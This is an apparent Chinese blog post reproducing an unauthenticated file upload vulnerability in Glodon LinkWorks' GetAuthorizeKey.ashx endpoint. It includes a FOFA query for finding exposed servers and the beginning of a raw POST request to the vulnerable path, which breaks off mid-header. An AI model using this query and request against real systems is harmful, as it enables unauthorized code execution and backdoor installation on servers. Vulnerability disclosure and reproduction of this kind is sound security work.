广联达Linkworks GetAuthorizeKey.ashx 文件上传漏洞复现

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

  由于广联达 LinkWorks /Services/FileService/UserFiles/GetAuthorizeKey.ashx接口处设置不当,未经身份认证的攻击者通过该漏洞上传恶意文件,可导致恶意代码执行、身份伪造、后门植入、敏感数据泄露,服务器被控等问题。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

广联达Linkworks GetAuthorizeKey.ashx 文件上传漏洞复现_第1张图片0x04 漏洞复现 

创建文件并获取上传授权码

POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (

你可能感兴趣的:(漏洞复现,安全,web安全)